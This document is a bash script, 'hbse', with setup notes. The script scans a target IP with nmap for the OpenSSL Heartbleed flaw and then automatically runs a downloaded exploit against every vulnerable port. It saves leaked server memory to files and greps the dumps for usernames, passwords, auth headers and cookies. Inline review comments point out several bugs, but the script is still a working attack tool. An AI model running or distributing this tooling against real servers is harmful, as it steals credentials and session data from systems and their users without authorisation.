# Heartbleed
# Affected OpenSSL versions
# The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
# Later versions (1.0.1g onwards) and previous versions (the 1.0.0 branch and older) are not vulnerable.
# Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
# Scan and exploit
# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # Non-interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # Non-interactive mode. Scan and exploit.
# Requirements
# apt-get install nmap
# wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
# mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
# wget http://nmap.org/svn/nselib/tls.lua
# mv tls.lua /usr/share/nmap/nselib/.
# wget -O heartbleed.c http://www.exploit-db.com/download/32791
# gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
# SCRIPT
# cat hbse
#!/bin/bash
### TCP ###
# 443 (HTTPS - HTTP over SSL)
# 465 (SMTPS - SMTP over SSL)
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 989 (FTPS Data - FTP Data over TLS/SSL)
# 990 (FTPS Control - FTP Control over TLS/SSL)
# 992 (Telnet over TLS/SSL)
# 993 (IMAPS - IMAP over SSL)
# 995 (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)
### UDP ###
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)
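# Argument handling.
#   hbse <ip>                    interactive mode
#   hbse --scan|--exploit <ip>   non-interactive; $se carries the mode flag
# Any other argument count is a usage error.  The original fell through to a
# bare "exit" (status 0, no message), so a missing target looked like a clean
# run; report it on stderr and exit 2 instead.
se=""
if [ $# -eq 1 ]; then
  ip="$1"
elif [ $# -eq 2 ]; then
  se="$1"
  ip="$2"
else
  printf 'Usage: %s [--scan|--exploit] <ip>\n' "${0##*/}" >&2
  exit 2
fi
# Ports handed to nmap: the TCP/UDP list documented in the header comment
# above, in nmap's "T:...,U:..." port-spec syntax.
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"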
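#######################################
# Print text to stdout in the given colour, expanding backslash escapes in
# the text (e.g. "\n") the same way `echo -e` does.
# Arguments: $1 - text to print
#            $2 - colour name: gray, red, green or yellow; any other value
#                 prints the text without a colour prefix
# Outputs:   the text wrapped in ANSI escapes; no newline is appended
#######################################
print() {
  local text=$1
  local color=$2
  # header is always (re)initialised: the original kept it as a global, so an
  # unknown colour silently reused the escape left over from the previous call.
  local header=''
  case "$color" in
    gray)   header='\e[38;5;250m' ;;
    red)    header='\e[91m' ;;
    green)  header='\e[92m' ;;
    yellow) header='\e[93m' ;;
  esac
  local tail='\e[0m'
  # %b expands the escapes like echo -e, but the argument is quoted: the
  # original `echo -en $header$text$tail` word-split the text (collapsing
  # runs of spaces) and glob-expanded any * or ? in it against the cwd,
  # which matters because dump contents are passed through this function.
  printf '%b' "${header}${text}${tail}"
}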
# Main flow: scan the target on 443, then on the wider port list, and
# optionally run ./heartbleed against each port reported as vulnerable.
# Reads: ip, se, nports (set above).  Writes dump files named "<ip>.<port>"
# in the current directory.  Every nmap/heartbleed/grep result is taken at
# face value; no command's exit status is checked anywhere below.
print "Checking if $ip is vulnerable on port 443... " "gray"
# First pass: port 443 only.  $ip is unquoted here and in every command
# below, so the shell word-splits it (harmless for a plain address, wrong for
# any value containing whitespace).
vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
if [ "$vulnerable" != "" ]; then
  print "Yes\n" "green"
  print "Checking if it is vulnerable on other ports... " "gray"
  # Second pass over the full TCP/UDP list: keep the two lines preceding each
  # "VULNERABLE:" marker, select the "open" port line and strip the "/tcp" or
  # "/udp" suffix, leaving one port number per line.
  vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
  # NOTE(review): $ports is never assigned anywhere in this script, so this
  # counts the lines of an empty string and n is always 1 -- the "No" branch
  # below is taken no matter how many ports the second scan found.  $vports
  # looks like the intended variable.
  n="`echo "$ports" | wc -l`"
  if [ "$n" == 1 ]; then
    print "No\n" "red"
    # Singular/plural wording reused by the prompts below.
    w1="port"
    w2="it"
    w3="file"
  else
    print "Yes\n" "green"
    w1="ports"
    w2="them"
    w3="files"
  fi
  print "Vulnerable $w1:\n" "gray"
  print "$vports\n" "green"
  # Mode selection: --scan stops here, --exploit skips the prompt, any other
  # (or no) first argument asks interactively.
  if [ "$se" == "--scan" ]; then exit
  elif [ "$se" == "--exploit" ]; then
    answer="Y"
  else
    print "Do you want to exploit $w2? [Yn] " "gray"
    # read without -r interprets backslashes.  Only an exact "Y" proceeds,
    # so "y" and an empty reply are both treated as no.
    read answer
  fi
  if [ "$answer" = "Y" ]; then
    print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
    # The port list is served on fd 3 so the interactive reads inside the
    # loop can keep using stdin.
    exec 3<<< "$vports"
    while read port <&3; do
      print "+ Port [$port]\n" "gray"
      # One dump file per port in the current directory; a stale file from an
      # earlier run is removed first so its presence can't be mistaken for a
      # result of this run.
      ofile="$ip.$port"
      if [ -f $ofile ]; then rm -f $ofile; fi
      # Per-port extra option for ./heartbleed.  What -c selects is defined by
      # heartbleed.c, which is not part of this page -- check there.
      if [ "$port" == "465" ]; then
        precmd='-c 0'
      elif [ "$port" == "993" ]; then
        precmd='-c 2'
      elif [ "$port" == "995" ]; then
        precmd='-c 1'
      else
        precmd=''
      fi
      # $precmd is deliberately unquoted so "-c 0" splits into two arguments
      # (quoting it would pass a single bogus argument; an array would be the
      # clean fix).  Output and exit status are discarded; success is inferred
      # solely from whether the dump file exists afterwards.
      ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
      if [ -f $ofile ]; then
        # Printable strings from the dump, filtered to credential-looking
        # keywords; the result is echoed back through print (which
        # interprets escapes, so dump content is not shown verbatim).
        r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
        print "$r\n" "green"
        if [ "$se" != "--exploit" ]; then
          print "Do you want to less the hexdump file? [Yn] " "gray"
          read answer
          if [ "$answer" = "Y" ]; then
            hexdump -C $ofile | less
          fi
        fi
      else
        print "Error: heartbleed did not work on port $port...\n" "yellow"
      fi
    done
    if [ "$se" != "--exploit" ]; then
      print "Do you want to delete the hexdump $w3? [Yn] " "gray"
      read answer
      if [ "$answer" = "Y" ]; then
        # Glob on "<ip>." -- this removes every file in the current directory
        # whose name starts with the target address, not only this run's
        # dumps.
        rm -f $ip.*
      fi
    fi
  fi
else
  print "No\n" "red"
fi